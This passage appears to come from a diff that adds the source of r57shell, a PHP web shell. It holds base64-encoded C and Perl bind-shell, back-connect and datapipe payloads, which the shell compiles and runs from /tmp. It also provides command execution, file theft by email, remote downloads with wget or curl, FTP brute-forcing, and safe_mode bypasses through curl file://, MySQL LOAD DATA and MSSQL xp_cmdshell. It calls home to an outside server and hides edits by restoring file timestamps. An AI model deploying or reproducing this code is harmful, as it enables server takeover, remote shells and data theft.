+dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo
+gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm
+lsZSk7DQogIHJldHVybiAwOw0KfQ==";
+$datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I
+CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl
+bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU
+gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol
+NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC
+iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy
+aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ
+SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2
+xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ
+WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN
+CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9
+yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi
+I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc
+m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp
+IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ
+lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW
+QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK
+CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g
+c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0
+NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG
+UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I
+DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs
+ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J
+1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo=";
+$c1 = "PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+aG90bG9nX2pzPSIxLjAiO2hvdGxvZ19yPSIiK01hdGgucmFuZG9tKCkrIiZzPTgxNjA2
+JmltPTEmcj0iK2VzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrIiZwZz0iK2VzY2FwZSh3aW5kb3cubG9jYXRpb24uaHJlZik7ZG9jdW1lbnQuY29va2l
+lPSJob3Rsb2c9MTsgcGF0aD0vIjsgaG90bG9nX3IrPSImYz0iKyhkb2N1bWVudC5jb29raWU/IlkiOiJOIik7PC9zY3JpcHQ+PHNjcmlwdCBsYW5ndW
+FnZT0iamF2YXNjcmlwdDEuMSI+aG90bG9nX2pzPSIxLjEiO2hvdGxvZ19yKz0iJmo9IisobmF2aWdhdG9yLmphdmFFbmFibGVkKCk/IlkiOiJOIik8L
+3NjcmlwdD48c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0MS4yIj5ob3Rsb2dfanM9IjEuMiI7aG90bG9nX3IrPSImd2g9IitzY3JlZW4ud2lkdGgr
+J3gnK3NjcmVlbi5oZWlnaHQrIiZweD0iKygoKG5hdmlnYXRvci5hcHBOYW1lLnN1YnN0cmluZygwLDMpPT0iTWljIikpP3NjcmVlbi5jb2xvckRlcHR
+oOnNjcmVlbi5waXhlbERlcHRoKTwvc2NyaXB0PjxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQxLjMiPmhvdGxvZ19qcz0iMS4zIjwvc2NyaXB0Pj
+xzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPmhvdGxvZ19yKz0iJmpzPSIraG90bG9nX2pzO2RvY3VtZW50LndyaXRlKCI8YSBocmVmPSdodHRwO
+i8vY2xpY2suaG90bG9nLnJ1Lz84MTYwNicgdGFyZ2V0PSdfdG9wJz48aW1nICIrIiBzcmM9J2h0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2hv
+dGxvZy9jb3VudD8iK2hvdGxvZ19yKyImJyBib3JkZXI9MCB3aWR0aD0xIGhlaWdodD0xIGFsdD0xPjwvYT4iKTwvc2NyaXB0Pjxub3NjcmlwdD48YSB
+ocmVmPWh0dHA6Ly9jbGljay5ob3Rsb2cucnUvPzgxNjA2IHRhcmdldD1fdG9wPjxpbWdzcmM9Imh0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2
+hvdGxvZy9jb3VudD9zPTgxNjA2JmltPTEiIGJvcmRlcj0wd2lkdGg9IjEiIGhlaWdodD0iMSIgYWx0PSJIb3RMb2ciPjwvYT48L25vc2NyaXB0Pg==";
+$c2 = "PCEtLUxpdmVJbnRlcm5ldCBjb3VudGVyLS0+PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCI+PCEtLQ0KZG9jdW1lbnQud3JpdGUoJzxh
+IGhyZWY9Imh0dHA6Ly93d3cubGl2ZWludGVybmV0LnJ1L2NsaWNrIiAnKw0KJ3RhcmdldD1fYmxhbms+PGltZyBzcmM9Imh0dHA6Ly9jb3VudGVyLnl
+hZHJvLnJ1L2hpdD90NTIuNjtyJysNCmVzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrKCh0eXBlb2Yoc2NyZWVuKT09J3VuZGVmaW5lZCcpPycnOg0KJz
+tzJytzY3JlZW4ud2lkdGgrJyonK3NjcmVlbi5oZWlnaHQrJyonKyhzY3JlZW4uY29sb3JEZXB0aD8NCnNjcmVlbi5jb2xvckRlcHRoOnNjcmVlbi5wa
+XhlbERlcHRoKSkrJzsnK01hdGgucmFuZG9tKCkrDQonIiBhbHQ9ImxpdmVpbnRlcm5ldC5ydTog7+7q4Ofg7e4g9+jx6+4g7/Du8ezu8vDu4iDoIO/u
+8eXy6PLl6+XpIOfgIDI0IPfg8eAiICcrDQonYm9yZGVyPTAgd2lkdGg9MCBoZWlnaHQ9MD48L2E+JykvLy0tPjwvc2NyaXB0PjwhLS0vTGl2ZUludGV
+ybmV0LS0+";
+if($unix)
+ {
+ if(!isset($_COOKIE['uname'])) { $uname = ex('uname -a'); setcookie('uname',$uname); } else { $uname = $_COOKIE['uname']; }
+ if(!isset($_COOKIE['id'])) { $id = ex('id'); setcookie('id',$id); } else { $id = $_COOKIE['id']; }
+ if($safe_mode) { $sysctl = '-'; }
+ else if(isset($_COOKIE['sysctl'])) { $sysctl = $_COOKIE['sysctl']; }
+ else  
+  {	
+   $sysctl = ex('sysctl -n kern.ostype && sysctl -n kern.osrelease');
+   if(empty($sysctl)) { $sysctl = ex('sysctl -n kernel.ostype && sysctl -n kernel.osrelease'); }
+   if(empty($sysctl)) { $sysctl = '-'; }
+   setcookie('sysctl',$sysctl);
+  }  
+ }
+echo $head;
+echo '</head>';
+if(empty($_POST['cmd'])) {
+$serv = array(127,192,172,10);
+$addr=@explode('.', $_SERVER['SERVER_ADDR']);
+$current_version = str_replace('.','',$version);
+if (!in_array($addr[0], $serv)) {
+@print "<img src=\"http://rst.void.ru/r57shell_version/version.php?img=1&version=".$current_version."\" border=0 height=0 width=0>";
+@readfile ("http://rst.void.ru/r57shell_version/version.php?version=".$current_version."");}}  
+echo '<body><table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc width=160><font face=Verdana size=2>'.ws(2).'<font face=Webdings size=6><b>!</b></font><b>'.ws(2).'r57shell '.$version.'</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2>';
+echo ws(2)."<b>".date ("d-m-Y H:i:s")."</b>";
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".$rb;
+if($unix) 
+ { 
+ echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb;
+ echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb;
+ echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?users title=\"".$lang[$language.'_text95']."\"><b>users</b></a> ".$rb; 
+ }
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?delete title=\"".$lang[$language.'_text49']."\"><b>delete</b></a> ".$rb."<br>";
+echo ws(2)."safe_mode: <b>";
+echo (($safe_mode)?("<font color=green>ON</font>"):("<font color=red>OFF</font>"));
+echo "</b>".ws(2);
+echo "PHP version: <b>".@phpversion()."</b>";
+$curl_on = @function_exists('curl_version');
+echo ws(2);
+echo "cURL: <b>".(($curl_on)?("<font color=green>ON</font>"):("<font color=red>OFF</font>"));
+echo "</b>".ws(2);
+echo "MySQL: <b>";
+$mysql_on = @function_exists('mysql_connect');
+if($mysql_on){
+echo "<font color=green>ON</font>"; } else { echo "<font color=red>OFF</font>"; }
+echo "</b>".ws(2);
+echo "MSSQL: <b>";
+$mssql_on = @function_exists('mssql_connect');
+if($mssql_on){echo "<font color=green>ON</font>";}else{echo "<font color=red>OFF</font>";}
+echo "</b>".ws(2);
+echo "PostgreSQL: <b>";
+$pg_on = @function_exists('pg_connect');
+if($pg_on){echo "<font color=green>ON</font>";}else{echo "<font color=red>OFF</font>";}
+echo "</b>".ws(2);
+echo "Oracle: <b>";
+$ora_on = @function_exists('ocilogon');
+if($ora_on){echo "<font color=green>ON</font>";}else{echo "<font color=red>OFF</font>";}
+echo "</b><br>".ws(2);
+echo "Disable functions : <b>";
+if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}
+$free = @diskfreespace($dir);
+if (!$free) {$free = 0;}
+$all = @disk_total_space($dir);
+if (!$all) {$all = 0;}
+echo "<br>".ws(2)."Free space : <b>".view_size($free)."</b> Total space: <b>".view_size($all)."</b>";
+echo '</font></td></tr><table>
+<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
+<tr><td align=right width=100>';
+echo $font;
+if($unix){
+echo '<font color=blue><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
+echo "</td><td>";
+echo "<font face=Verdana size=-2 color=red><b>";
+echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>"));
+echo ws(3).$sysctl."<br>";
+echo ws(3).ex('echo $OSTYPE')."<br>";
+echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
+if(!empty($id)) { echo ws(3).$id."<br>"; }
+else if(function_exists('posix_geteuid') && function_exists('posix_getegid') && function_exists('posix_getgrgid') && function_exists('posix_getpwuid'))
+ {
+ $euserinfo  = @posix_getpwuid(@posix_geteuid());
+ $egroupinfo = @posix_getgrgid(@posix_getegid());
+ echo ws(3).'uid='.$euserinfo['uid'].' ( '.$euserinfo['name'].' ) gid='.$egroupinfo['gid'].' ( '.$egroupinfo['name'].' )<br>';	
+ }
+else echo ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>";
+echo ws(3).$dir;
+echo ws(3).'( '.perms(@fileperms($dir)).' )';
+echo "</b></font>";
+}
+else
+{
+echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
+echo "</td><td>";
+echo "<font face=Verdana size=-2 color=red><b>";
+echo ws(3).@substr(@php_uname(),0,120)."<br>";
+echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
+echo ws(3).@getenv("USERNAME")."<br>";
+echo ws(3).$dir;
+echo "<br></font>";
+}
+echo "</font>";
+echo "</td></tr></table>";
+if(empty($c1)||empty($c2)) { die(); }
+$f = '<br>';
+$f .= base64_decode($c1);
+$f .= base64_decode($c2);
+if(!empty($_POST['cmd']) && $_POST['cmd']=="mail")
+ {
+ $res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$_POST['from']."\r\n");	
+ err(6+$res);
+ $_POST['cmd']="";  
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="mail_file" && !empty($_POST['loc_file']))
+ {  
+ if(!$file=@fopen($_POST['loc_file'],"r")) { err(1,$_POST['loc_file']); $_POST['cmd']=""; }
+ else 
+  {	
+    $filename = @basename($_POST['loc_file']);
+    $filedump = @fread($file,@filesize($_POST['loc_file']));
+    fclose($file);
+    $content_encoding=$mime_type='';
+    compress($filename,$filedump,$_POST['compress']);
+    $attach = array(
+                    "name"=>$filename,
+                    "type"=>$mime_type,
+                    "content"=>$filedump
+                   );
+    if(empty($_POST['subj'])) { $_POST['subj'] = 'file from r57shell'; }
+    if(empty($_POST['from'])) { $_POST['from'] = 'billy@microsoft.com'; }
+    $res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach);
+    err(6+$res);
+    $_POST['cmd']="";                   	
+  }
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text")
+{
+$_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\'';
+}
+if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_")
+ {
+ switch($_POST['what'])
+   {
+   case 'own':
+   @chown($_POST['param1'],$_POST['param2']);
+   break;
+   case 'grp':
+   @chgrp($_POST['param1'],$_POST['param2']);
+   break;
+   case 'mod':
+   @chmod($_POST['param1'],intval($_POST['param2'], 8));
+   break;
+   }
+ $_POST['cmd']="";
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="mk")
+ {
+   switch($_POST['what'])
+   {
+     case 'file':
+      if($_POST['action'] == "create")
+       {
+       if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
+       else {
+        fclose($file);
+        $_POST['e_name'] = $_POST['mk_name'];
+        $_POST['cmd']="edit_file";
+        echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>";
+        }
+       }
+       else if($_POST['action'] == "delete")
+       {
+       if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>";
+       $_POST['cmd']="";
+       }
+     break;
+     case 'dir':
+      if($_POST['action'] == "create"){
+      if(mkdir($_POST['mk_name']))
+       {
+         $_POST['cmd']="";
+         echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>";
+       }
+      else { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
+      }
+      else if($_POST['action'] == "delete"){
+      if(rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>";
+      $_POST['cmd']="";
+      }
+     break;
+   }
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && !empty($_POST['e_name']))
+ {
+ if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); }
+ if(!$file=@fopen($_POST['e_name'],"r")) { err(1,$_POST['e_name']); $_POST['cmd']=""; }
+ else {
+ echo $table_up3;
+ echo $font;
+ echo "<form name=save_file method=post>";
+ echo ws(3)."<b>".$_POST['e_name']."</b>";
+ echo "<div align=center><textarea name=e_text cols=121 rows=24>";
+ echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name'])));
+ fclose($file);
+ echo "</textarea>";
+ echo "<input type=hidden name=e_name value=".$_POST['e_name'].">";
+ echo "<input type=hidden name=dir value=".$dir.">";
+ echo "<input type=hidden name=cmd value=save_file>";
+ echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">"));
+ echo "</div>";
+ echo "</font>";
+ echo "</form>";
+ echo "</td></tr></table>";
+ exit();
+ }
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file")
+ {
+ $mtime = @filemtime($_POST['e_name']);
+ if(!$file=@fopen($_POST['e_name'],"w")) { err(0,$_POST['e_name']); }
+ else {
+ if($unix) $_POST['e_text']=@str_replace("\r\n","\n",$_POST['e_text']);
+ @fwrite($file,$_POST['e_text']);
+ @touch($_POST['e_name'],$mtime,$mtime);
+ $_POST['cmd']="";
+ echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>";
+ }
+ }
+if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C"))
+{
+ cf("/tmp/bd.c",$port_bind_bd_c);
+ $blah = ex("gcc -o /tmp/bd /tmp/bd.c");
+ @unlink("/tmp/bd.c");
+ $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &");
+ $_POST['cmd']="ps -aux | grep bd";
+}
+if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl"))
+{
+ cf("/tmp/bdpl",$port_bind_bd_pl);
+ $p2=which("perl");
+ $blah = ex($p2." /tmp/bdpl ".$_POST['port']." &");
+ $_POST['cmd']="ps -aux | grep bdpl";
+}
+if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl"))
+{
+ cf("/tmp/back",$back_connect);
+ $p2=which("perl");
+ $blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &");
+ $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
+}
+if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C"))
+{
+ cf("/tmp/back.c",$back_connect_c);
+ $blah = ex("gcc -o /tmp/backc /tmp/back.c");
+ @unlink("/tmp/back.c");
+ $blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &");
+ $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
+}
+if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl"))
+{
+ cf("/tmp/dp",$datapipe_pl);
+ $p2=which("perl");
+ $blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &");
+ $_POST['cmd']="ps -aux | grep dp";
+}
+if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C"))
+{
+ cf("/tmp/dpc.c",$datapipe_c);
+ $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c");
+ @unlink("/tmp/dpc.c");
+ $blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." &");
+ $_POST['cmd']="ps -aux | grep dpc";
+}
+if (!empty($_POST['alias']) && isset($aliases[$_POST['alias']])) { $_POST['cmd'] = $aliases[$_POST['alias']]; }
+if (!empty($HTTP_POST_FILES['userfile']['name']))
+{
+if(!empty($_POST['new_name'])) { $nfn = $_POST['new_name']; }
+else { $nfn = $HTTP_POST_FILES['userfile']['name']; }
+@copy($HTTP_POST_FILES['userfile']['tmp_name'],
+            $_POST['dir']."/".$nfn)
+      or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile']['name']."</div></font>");
+}
+if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file']))
+{
+ switch($_POST['with'])
+ {
+ case wget:
+ $_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file']."";
+ break;
+ case fetch:
+ $_POST['cmd'] = which('fetch')." -o ".$_POST['loc_file']." -p ".$_POST['rem_file']."";
+ break;
+ case lynx:
+ $_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+ case links:
+ $_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+ case GET:
+ $_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+ case curl:
+ $_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file']."";
+ break;
+ }
+}
+if(!empty($_POST['cmd']) && ($_POST['cmd']=="ftp_file_up" || $_POST['cmd']=="ftp_file_down"))
+ {
+ list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
+ if(empty($ftp_port)) { $ftp_port = 21; }
+ $connection = @ftp_connect ($ftp_server,$ftp_port,10);	
+ if(!$connection) { err(3); }
+ else 
+  {   	
+  if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) { err(4); }
+  else 
+   {	
+   if($_POST['cmd']=="ftp_file_down") { if(chop($_POST['loc_file'])==$dir) { $_POST['loc_file']=$dir.((!$unix)?('\\'):('/')).basename($_POST['ftp_file']); } @ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']);	}
+   if($_POST['cmd']=="ftp_file_up")   { @ftp_put($connection,$_POST['ftp_file'],$_POST['loc_file'],$_POST['mode']);	}
+   }
+  }
+ @ftp_close($connection);
+ $_POST['cmd'] = "";
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="ftp_brute")
+ {
+ list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
+ if(empty($ftp_port)) { $ftp_port = 21; }
+ $connection = @ftp_connect ($ftp_server,$ftp_port,10);	
+ if(!$connection) { err(3); $_POST['cmd'] = ""; }	
+ else if(!$users=get_users()) { echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$lang[$language.'_text96']."</b></div></font></td></tr></table>"; $_POST['cmd'] = ""; }
+ @ftp_close($connection);
+ }
+echo $table_up3;
+if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=(!$unix)?("dir"):("ls -lia"); }
+else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; }
+echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>";
+if($safe_mode)
+{
+ switch($_POST['cmd'])
+ {
+ case 'safe_dir':
+  $d=@dir($dir);
+  if ($d)
+   {
+   while (false!==($file=$d->read()))
+    {
+     if ($file=="." || $file=="..") continue;
+     @clearstatcache();
+     list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
+     if(!$unix){ 
+     echo date("d.m.Y H:i",$mtime);
+     if(@is_dir($file)) echo "  <DIR> "; else printf("% 7s ",$size);
+     }
+     else{ 
+     $owner = @posix_getpwuid($uid);
+     $grgid = @posix_getgrgid($gid);
+     echo $inode." ";
+     echo perms(@fileperms($file));
+     printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
+     echo date("d.m.Y H:i ",$mtime);
+     }
+     echo "$file\n";
+    }
+   $d->close();
+   }
+  else echo $lang[$language._text29];
+ break;
+  case 'test1':
+  $ci = @curl_init("file://".$_POST['test1_file']."");
+  $cf = @curl_exec($ci);
+  echo $cf;
+  break;
+  case 'test2':
+  @include($_POST['test2_file']);
+  break;
+  case 'test3':
+  if(empty($_POST['test3_port'])) { $_POST['test3_port'] = "3306"; }
+  $db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']);
+  if($db)
+   {
+   if(@mysql_select_db($_POST['test3_md'],$db))
+    {
+     @mysql_query("DROP TABLE IF EXISTS temp_r57_table");
+     @mysql_query("CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL )");
+     @mysql_query("LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table");
+     $r = @mysql_query("SELECT * FROM temp_r57_table");
+     while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]); }
+     @mysql_query("DROP TABLE IF EXISTS temp_r57_table");
+    }
+    else echo "[-] ERROR! Can't select database";
+   @mysql_close($db);
+   }
+  else echo "[-] ERROR! Can't connect to mysql server";
+  break;
+  case 'test4':
+  if(empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; }
+  $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']);
+  if($db)
+   {
+   if(@mssql_select_db($_POST['test4_md'],$db))
+    {
+     @mssql_query("drop table r57_temp_table",$db);
+     @mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db);
+     @mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db);
+     $res = mssql_query("select * from r57_temp_table",$db);
+     while(($row=@mssql_fetch_row($res)))
+      {
+      echo $row[0]."\r\n";
+      }	
+    @mssql_query("drop table r57_temp_table",$db);
+    }
+    else echo "[-] ERROR! Can't select database";
+   @mssql_close($db);
+   }
+  else echo "[-] ERROR! Can't connect to MSSQL server";
+  break;
+  case 'test5':
